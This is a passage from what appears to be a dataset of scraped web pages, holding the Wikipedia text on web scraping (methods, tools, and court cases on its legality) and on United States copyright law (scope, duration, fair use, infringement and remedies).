online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
390 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/US_Copyright_law | The copyright law of the United States grants monopoly protection for "original works of authorship". 1 2 With the stated purpose to promote art and culture, copyright law assigns a set of exclusive rights to authors: to make and sell copies of their works, to create derivative works, and to perform or display their works publicly. These exclusive rights are subject to a time and generally expire 70 years after the author's death or 95 years after publication. In the United States, works published before January 1, 1929, are in the public domain. United States copyright law was last generally revised by the Copyright Act of 1976, codified in Title 17 of the United States Code. The United States Constitution explicitly grants Congress the power to create copyright law under Article 1, Section 8, Clause 8, known as the Copyright Clause. 3 Under the Copyright Clause, Congress has the power "To promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. 3 The United States Copyright Office handles copyright registration, recording of copyright transfers, and other administrative aspects of copyright law. 4 United States copyright law traces its lineage back to the British Statute of Anne, which influenced the first U.S. federal copyright law, the Copyright Act of 1790. The length of copyright established by the Founding Fathers was 14 years, plus the ability to renew it one time, for 14 more. 40 years later, the initial term was changed to 28 years. It was not until a full 180 years after its establishment that it was significantly extended beyond that, through the Copyright Act of 1976 to "Either 75 years or the life of the author plus 50 years" and the Sonny Bono Copyright Term Extension Act of 1998 (also called the "Mickey Mouse Protection Act", because it prevented the copyright from expiring on the first commercial success of the Disney cartoon character Mickey Mouse), which increased it even more, to 95 years after publication (120 years after creation for unpublished works), or the life of the author plus 70 years, whichever ends earlier. The Congress shall have Power ... to promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. The goal of copyright law, as set forth in the Copyright Clause of the US Constitution, is "to promote the Progress of Science and useful Arts, by securing for limited Times to Authors and Inventors the exclusive Right to their respective Writings and Discoveries. 3 This includes incentivizing the creation of art, literature, architecture, music, and other works of authorship. As with many legal doctrines, the effectiveness of copyright law in achieving its stated purpose is a matter of debate. 5 The United States copyright law protects "original works of authorship" fixed in a tangible medium, 1 including literary, dramatic, musical, artistic, and other intellectual works. This protection is available to both published and unpublished works. Copyright law includes the following types of works: Copyright law protects the "expression" of an idea, but copyright does not protect the "idea" itself. This distinction is called the idea expression dichotomy. 7 The distinction between "idea" and "expression" is fundamental to copyright law. From the Copyright Act of 1976 (17 U.S.C. 102): In no case does copyright protection for an original work of authorship extend to any idea, procedure, process, system, method of operation, concept, principle, or discovery, regardless of the form in which it is described, explained, illustrated, or embodied in such work. For example, a paper describing a political theory is copyrightable. The paper is the expression of the author's ideas about the political theory. The theory itself is just an idea, and is not copyrightable. Another author is free to describe the same theory in their own words without infringing on the original author's copyright. 8 Although fundamental, the idea expression dichotomy is often difficult to put into practice. Reasonable people can disagree about where the unprotectable "idea" ends and the protectable "expression" begins. As Judge Learned Hand put it, "Obviously, no principle can be stated as to when an imitator has gone beyond copying the 'idea, and has borrowed its 'expression. Decisions must therefore inevitably be ad hoc. 9 Mere facts are not copyrightable. However, compilations of facts are treated differently, and may be copyrightable material. The Copyright Act, 103, allows copyright protection for "compilations", as long as there is some "creative" or "original" act involved in developing the compilation, such as in the selection (deciding which facts to include or exclude) and arrangement (how facts are displayed and in what order). Copyright protection in compilations is limited to the selection and arrangement of facts, not to the facts themselves. The Supreme Court decision in Feist Publications, Inc., v. Rural Telephone Service Co. clarified the requirements for copyright in compilations. The Feist case denied copyright protection to a "white pages" phone book (a compilation of telephone numbers, listed alphabetically). In making this ruling, the Supreme Court rejected the "sweat of the brow" doctrine. That is, copyright protection requires creativity, and no amount of hard work ("sweat of the brow") can transform a non-creative list (like an alphabetical listing of phone numbers) into copyrightable subject matter. A mechanical, non-selective collection of facts (e.g., alphabetized phone numbers) cannot be protected by copyright. 10 Copyright protects artistic expression. Copyright does not protect useful articles, or objects with some useful functionality. The Copyright Act states: A "useful article" is an article having an intrinsic utilitarian function that is not merely to portray the appearance of the article or to convey information. An article that is normally a part of a useful article is considered a "useful article". "the design of a useful article, as defined in this section, shall be considered a pictorial, graphic, or sculptural work only if, and only to the extent that, such design incorporates pictorial, graphic, or sculptural features that can be identified separately from, and are capable of existing independently of, the utilitarian aspects of the article. 11 However, many industrial designers create works that are both artistic and functional. Under these circumstances, copyright law only protects the artistic expression of such a work, and only to the extent that the artistic expression can be separated from its utilitarian function. 12 In 2017, the US Supreme Court granted certiorari in the case Star Athletica, L. L. C. v. Varsity Brands, Inc. to determine when a "pictorial, graphic, or sculptural feature" incorporated into a useful article is eligible for copyright protection, 13 holding that such features are eligible for copyright protection "only if the feature (1) can be perceived as a two- or three-dimensional work of art separate from the useful article and (2) would qualify as a protectable pictorial, graphic, or sculptural work—either on its own or fixed in some other tangible medium of expression—if it were imagined separately from the useful article into which it is incorporated. 14 Star Athletica began as a suit by Varsity Brands against Star Athletica for infringing the copyright of five cheerleader uniform designs. 15 Applying its new test to the cheerleader uniform designs, the court said: First, one can identify the decorations as features having pictorial, graphic, or sculptural qualities. Second, if the arrangement of colors, shapes, stripes, and chevrons on the surface of the cheerleading uniforms were separated from the uniform and applied in another medium—for example, on a painter's canvas—they would qualify as "two-dimensional ... works of ... art". And imaginatively removing the surface decorations from the uniforms and applying them in another medium would not replicate the uniform itself. Indeed, respondents have applied the designs in this case to other media of expression—different types of clothing—without replicating the uniform. The decorations are therefore separable from the uniforms and eligible for copyright protection. 16 This produces a relatively low threshold for pictorial, graphic, or sculptural features on useful articles to be eligible for copyright protection, which one commentator clearly highlighted: the Star Athletica decision "really has ensured that all but the subtlest graphic designs will be able to gain copyright protection...once we determine that the designs 'hav e … graphic … qualities … and could be applied … on a painter's canvas, the test for copyrightability is met. 17 Works created by the federal government are not copyrightable. 18 This restriction on copyright applies to publications produced by the United States Government, and its agents or employees within the scope of their employment. 19 However, government contractors are generally not considered employees, and their works may be subject to copyright. Additionally, the government can purchase and hold the copyright to works created by third parties. The government may restrict access to works it has produced through other mechanisms. For instance, classified materials may not be protected by copyright, but are restricted by other applicable laws. Even in case of non-classified materials, there may be specific prohibitions against usage, such as the presidential seal, which is restricted for commercial uses. 20 Federal, state, and local statutes and court decisions are in the public domain and are ineligible for copyright, a concept known as the government edicts doctrine. It is not difficult to see the motivations behind this: The citizens are the authors of the law, and therefore its owners, regardless of who actually drafts the provisions, because the law derives its authority from the consent of the public, expressed through the democratic process. 21 Three key Supreme Court cases established this government edicts doctrine: Wheaton v. Peters (1834), Banks v. Manchester (1888), and Callaghan v. Myers (1888). 22 The doctrine was codified into the United States Code at 17 U.S.C. 105 via the Copyright Act of 1976. The Copyright Office upholds this doctrine within its own regulations: As a matter of longstanding public policy, the U.S. Copyright Office will not register a government edict that has been issued by any state, local, or territorial government, including legislative enactments, judicial decisions, administrative rulings, public ordinances, or similar types of official legal materials. Likewise, the Office will not register a government edict issued by any foreign government or any translation prepared by a government employee acting within the course of his or her official duties. 23 The Supreme Court has also ruled that annotated versions of statutes or court decisions at the federal, state, and local level, when such annotations are done by members of the government as part of their duties, are ineligible for copyright in Georgia v. Public.Resource.Org, Inc. (2020). 24 There are six basic rights protected by copyright. 25 The owner of a copyright has the exclusive right to do and authorize others to do the following: A violation of any of the exclusive rights of the copyright holder is a copyright infringement, unless fair use (or a similar affirmative defense) applies. 27 The initial owner of the copyright to a work is the author, unless that work is a "work made for hire". If a work is not a work for hire, then the author will be the initial copyright owner. The author generally is the person who conceives of the copyrightable expression and "fixes" it in a "tangible medium of expression. Special rules apply when multiple authors are involved: Three types of transfers exist for copyrighted works. The first two, assignment and exclusive licenses, require the transfer to be in writing. Nonexclusive licenses need not be in writing and they may be implied by the circumstances. Transfers of copyright always involve one or more of the exclusive rights of copyright. For instance, a license may provide a right to perform a work, but not to reproduce it or to prepare a derivative work (adaptation right). 33 The terms of the license are governed by the applicable contract law; however, there is substantial academic debate about to what extent the Copyright Act preempts state contract law principles. 34 An author, after transferring a copyright, can terminate the transfer under certain circumstances. This right to terminate the transfer is absolute and cannot be waived. 35 For works published before 1978, copyrights may revert to the author after 56 years. For example, Paul McCartney reclaimed the U.S. publishing rights to early Beatles songs from Sony Music Publishing, beginning in October 2018. 36 For works published since 1978, copyrights may revert to the original author after 35 years. 17 U.S.C. 203(a) states that the author must write a letter requesting a termination of the original copyright grant at least two years before the effective termination date. 37 Title 17, United States Code, Section 108 places limitations on exclusive copyrights for the purposes of certain limited reproduction by a public library or an archive. 38 39 Title 17, United States Code, Section 107 also places statutory limits on copyright which are commonly referred to as the fair use exception. 40 41 Copyright is automatically granted to the author of an original work (that otherwise meets the basic copyright requirements, discussed above). Registration is not necessary. However, registration amplifies a copyright holder's rights in a number of ways. Registration, or refusal of registration, 42 is required before a lawsuit can be filed, and registration creates the possibility for enhanced "statutory" damages. A copyright can be registered online at the US Copyright Office's website. The Copyright Office reviews applications for obvious errors or lack of copyrightable subject matter and then issues a certificate of registration. The Copyright Office does not compare the author's new work against a collection of existing works or otherwise check for infringement. The United States Copyright Office requires a deposit copy of the work for which copyright registration is sought. Deposits can be made through the Copyright Office's eCO System. This deposit requirement serves two purposes. First, if a copyright infringement lawsuit arises, the owner may prove that the material that is infringed is exactly the same material for which the owner has secured a registration. Second, this requirement helps the Library of Congress build its collection of works. citation needed Failure to comply with the deposit requirement, as modified by Copyright Office regulations, is punishable by fine, but does not result in forfeiture of copyright. The use of copyright notices is optional. The Berne Convention, amending US copyright law in 1989, makes copyright automatic. 43 However, the lack of notice of copyright using these marks may have consequences in terms of reduced damages in an infringement lawsuit—using notices of this form may reduce the likelihood of a defense of "innocent infringement" being successful. 44 Copyright protection generally lasts for 70 years after the death of the author. If the work was a "work for hire", then copyright persists for 120 years after creation or 95 years after publication, whichever is shorter. For works created before 1978, the copyright duration rules are complicated. However, works published before January 1, 1929 (other than sound recordings), have made their way into the public domain. All copyright terms run to the end of the calendar year in which they would otherwise expire. 45 For works published or registered before 1978, the maximum copyright duration is 95 years from the date of publication, if copyright was renewed during the 28th year following publication. 46 Copyright renewal has been automatic since the Copyright Renewal Act of 1992. For works created before 1978, but not published or registered before 1978, the standard 302 copyright duration of 70 years from the author's death also applies. 47 Prior to 1978, works had to be published or registered to receive copyright protection. Upon the effective date of the 1976 Copyright Act (which was January 1, 1978) this requirement was removed and these unpublished, unregistered works received protection. However, Congress intended to provide an incentive for these authors to publish their unpublished works. To provide that incentive, these works, if published before 2003, would not have their protection expire before 2048. 48 All copyrightable works published in the United States before 1929 are in the public domain; 48 works created but not published or copyrighted before January 1, 1978, may be protected until 2047. 49 For works that received their copyright before 1978, a renewal had to be filed in the work's 28th year with the Copyright Office for its term of protection to be extended. The need for renewal was eliminated by the Copyright Renewal Act of 1992, but works that had already entered the public domain by non-renewal did not regain copyright protection. Therefore, works published before 1964 that were not renewed are in the public domain. Before 1972, sound recordings were not subject to federal copyright, but copying was nonetheless regulated under various state torts and statutes, some of which had no duration limit. The Sound Recording Amendment of 1971 extended federal copyright to recordings fixed on or after February 15, 1972, and declared that recordings fixed before that date would remain subject to state or common law copyright. Subsequent amendments had extended this latter provision until 2067. 50 As a result, older sound recordings were not subject to the expiration rules that applied to contemporary visual works. Although these could have entered the public domain as a result of government authorship or formal grant by the owner, the practical effect was to render public domain audio virtually nonexistent. 51 This situation changed with the 2018 enactment of the Music Modernization Act, which extended federal copyright protection to all sound recordings, regardless of their date of creation, and preempted state copyright laws on those works. Under the Act, the first sound recordings to enter the public domain were those fixed before 1923, which entered the public domain on January 1, 2022. Recordings fixed between 1923 and February 14, 1972, will be phased into the public domain in the following decades. 52 53 Specifically, works fixed 1923 1946 are public after 100 years and works fixed 1947 1956 after 110 years of fixation. Works fixed 1 January 1957 14 February 1972 will all become public on 15 February 2067. 48 In May 2016, Judge Percy Anderson ruled in a lawsuit between ABS Entertainment and CBS Radio that "remastered" versions of pre 1972 recordings can receive a federal copyright as a distinct work due to the amount of creative effort expressed in the process. 54 The Ninth Circuit appeals court reversed the decision in favor of ABS Entertainment. 55 United States copyright law includes numerous defenses, exceptions, and limitations. Some of the most important include: Fair use is the use of limited amounts of copyrighted material in such a way as to not be an infringement. It is codified at 17 U.S.C. 107, and states that "the fair use of a copyrighted work ... is not an infringement of copyright. The section lists four factors that must be assessed to determine whether a particular use is fair. There are no bright-line rules regarding fair use and each determination is made on an individualized case-by-case basis. 71 In addition to these four factors, the statute also allows courts to consider any other factors that may be relevant to the fair use analysis. Courts evaluate fair use claims on a case-by-case basis, and the outcome of any given case depends on the specific facts of that case. There is no formula to ensure that a predetermined percentage or amount of a work—or specific number of words, lines, pages, copies—may be used without permission. 72 The justification of the fair use doctrine turns primarily on whether, and to what extent, the challenged use is transformative. "The use must be productive and must employ the quoted matter in a different manner or for a different purpose from the original. A quotation of copyrighted material that merely repackages or republishes the original is unlikely to pass the test.... If, on the other hand, the secondary use adds value to the original—if the quoted matter is used as raw material, transformed in the creation of new information, new aesthetics, new insights and understandings—this is the very type of activity that the fair use doctrine intends to protect for the enrichment of society. 73 The Copyright Office provides a searchable list of fair use case law. 74 Copyright infringement occurs when someone violates one of the exclusive rights listed in 17 USC 106. Commonly, this involves someone creating or distributing a "copy" of a protected work that is "substantially similar" to the original version. Infringements requires copying. If two people happen to write exactly the same story, without knowledge of the other, there is no infringement. A copyright owner may bring a copyright infringement lawsuit in federal court. Federal courts have exclusive subject-matter jurisdiction over copyright infringement cases. 75 That is, an infringement case may not be brought in state courts. (With an exception for works not protected under Federal law, but are protected under state law, e.g. state laws prohibiting copying of sound recordings made before February 15, 1972.) Note that the Copyright Office handles copyright registrations, but it does not adjudicate copyright infringement disputes. To bring a copyright infringement lawsuit, a copyright holder must establish ownership of a valid copyright and the copying of constituent elements of the work that are original. 76 The copyright owner must also establish both (a) actual copying and (b) improper appropriation of the work. The copyright owner, as plaintiff, bears the burden of establishing these three elements of the prima facie case for infringement. A plaintiff establishes ownership by authorship (by the plaintiff itself or by someone who assigned rights to the plaintiff) of (1) an original work of authorship that is (2) fixed in a tangible medium (e.g. a book, musical recording, etc.). Registration is not required to establish copyright protection, but registration is necessary before bringing a lawsuit. Registration is also useful because it creates a presumption of a valid copyright, it allows the plaintiff to collect enhanced "statutory damages", and to be eligible for an award of attorney fees. A plaintiff establishes "actual copying" with direct or indirect evidence. Direct evidence is satisfied either by a defendant's admission to copying or the testimony of witnesses who observed the defendant in the act. More commonly, a plaintiff relies on circumstantial or indirect evidence. A court will infer copying by a showing of a "striking similarity" between the copyrighted work and the alleged copy, along with a showing of both access and use of that access. 77 A plaintiff may establish "access" by proof of distribution over a large geographical area, or by eyewitness testimony that the defendant owned a copy of the protected work. Access alone is not sufficient to establish infringement. The plaintiff must show a similarity between the two works, and the degree of similarity will affect the probability that illicit copying in fact occurred in the court's eyes. 78 Even then, the plaintiff must show that the copying amounted to improper appropriation. Indeed, the United States Supreme Court has held that not all copying constitutes infringement and a showing of misappropriation is necessary. 79 A copyrighted work may contain elements that are not copyrightable, such as facts, ideas, themes, or content in the public domain. A plaintiff alleging misappropriation must first demonstrate that what the defendant appropriated from the copyrighted work was protectable. Second, a plaintiff must show that the intended audience will recognize substantial similarities between the two works. The intended audience may be the general public, or a specialized field. The degree of similarity necessary for a court to find misappropriation is not easily defined. Indeed, "the test for infringement of a copyright is of necessity vague. 80 Two methods are used to determine if unlawful appropriation has occurred: the "subtractive method" and the "totality method". The subtractive method, also known as the "abstraction subtraction approach", seeks to analyze which parts of a copyrighted work are protectible and which are not. 81 The unprotected elements are subtracted and the fact finder then determines whether substantial similarities exist in the protectible expression which remains. For instance, if the copyright holder for West Side Story alleged infringement, the elements of that musical borrowed from Romeo and Juliet would be subtracted before comparing it to the allegedly infringing work because Romeo and Juliet exists in the public domain. The totality method, also known as the "total concept and feel" approach, takes the work as a whole with all elements included when determining if a substantial similarity exists. This was first formulated in Roth Greeting Cards v. United Card Co. (1970). 82 The individual elements of the alleged infringing work may by themselves be substantially different from their corresponding part in the copyrighted work, but nevertheless taken together be a clear misappropriation of copyrightable material. 83 Modern courts may sometimes use both methods in their analysis of misappropriation. 84 In other instances, one method may find misappropriation while the other would not, making misappropriation a contentious topic in infringement litigation. 85 A successful copyright infringement plaintiff may seek both "injunctive relief" and monetary damages. As of 2019, the United States Supreme Court has held that a copyright holder must register his copyright with the U.S. copyright office before he may seek any judicial remedies for infringement. 86 Injunctions: Copyright Act 502 authorizes courts to grant both preliminary and permanent injunctions against copyright infringement. There are also provisions for impounding allegedly infringing copies and other materials used to infringe, and for their destruction. Damages and or Profits: Copyright Act 504 gives the copyright owner a choice of recovering: (1) their actual damages and any additional profits of the defendant; or (2) statutory damages. However, Title 17 United States Code 411(a) states that a civil action to enforce a copyright claim in a US work cannot be made until the work has been registered with the U.S. Copyright Office, with a narrow exception if the claim was filed and rejected by the Copyright Office. 87 88 In 2019, the U.S. Supreme Court decided that 411(a) requires that a lawsuit cannot be initiated until the Copyright Office has processed, not merely received, the application. 88 89 Both temporary and permanent injunctions are available to prevent or restrain infringement of a copyright. 90 An "injunction" is a court order directing the defendant to stop doing something (e.g., stop selling infringing copies). One form of equitable relief that is available in copyright cases is a seizure order. At any time during the lawsuit, the court may order the impoundment of any and all copies of the infringing products. The seizure order may include materials used to produce such copies, such as master tapes, film negatives, printing plates, etc. Items that are impounded during the course of the lawsuit can, if the plaintiff wins, be ordered destroyed as part of the final decree. A copyright holder can also seek monetary damages. Injunctions and damages are not mutually exclusive. One can have injunctions and no damages, or damages and no injunctions, or both injunctions and damages. There are two types of damages: actual damages and profits, or statutory damages. 91 The copyright owner may recover the profits he or she would have earned absent the infringement (actual damages) and any profits the infringer might have made as a result of the infringement but that are not already considered in calculating actual damages. 91 To recover actual damages, the plaintiff must prove to the court that, in the absence of the infringement, the plaintiff would have been able to make additional sales, or perhaps been able to charge higher prices, and that this would have resulted in profits given the owner's cost structure. 92 In some cases, the profits earned by the infringer exploiting the copyrighted material may exceed those earned by or potentially available to the owner. In these circumstances, the copyright owner can recover the infringer's profits if he or she can demonstrate a nexus between the profits and the infringing use. 93 Statutory damages are available as an alternative to actual damages and profits. 94 If the copyright was registered either (a) within three months of publication or (b) before the infringement, then the plaintiff is eligible to seek statutory damages. 94 Statutory damages can be awarded by the court within the range of $750 to $30,000, but this can be lowered if the infringement is deemed inadvertent, or increased significantly if the infringement is willful. 95 Statutory damages are sometimes preferable for the plaintiff if actual damages and profits are too small, too difficult to prove, or both. There are, however, situations where statutory damages are not available. 17 U.S.C. 412 provides: Statutory damages are calculated per work infringed. 94 According to clause (1) of Title 17, U.S.C. Section 504(c), statutory damages range from $750 per work to $30,000 per work, with two principal exceptions: Damages in copyright cases can be very high. In Lowry's Reports, Inc. v. Legg Mason Inc., 97 a 2003 lawsuit between a publisher of stock analysis newsletters against a company that buys one copy of the newsletters and makes multiple copies for use in-house, the jury awarded damages actual damages for some newsletters and statutory damages for other newsletters totaling $20 million. Cost and attorney fees: Copyright Act 505 permits courts, in their discretion, to award costs against either party and to award reasonable attorney fees to the prevailing party. The court may (but is not required to) award to the "prevailing party" reasonable attorney's fees. 98 This applies to both a winning plaintiff (copyright owner) and a winning defendant (accused infringer). 99 However, attorney's fees award is not available against the government. Like statutory damages, attorney's fees are not available if the work infringed is not registered at the time of infringement. In addition to the civil remedies, the Copyright Act provides for criminal prosecution in some cases of willful copyright infringement. There are also criminal sanctions for fraudulent copyright notice, fraudulent removal of copyright notice, and false representations in applications for copyright registration. The Digital Millennium Copyright Act imposes criminal sanctions for certain acts of circumvention and interference with copyright management information. There are not criminal sanctions for violating the rights of attribution and integrity held by the author of a work of visual art. Criminal penalties for copyright infringement include: Nonprofit libraries, archives, education institutions and public broadcasting entities are exempt from 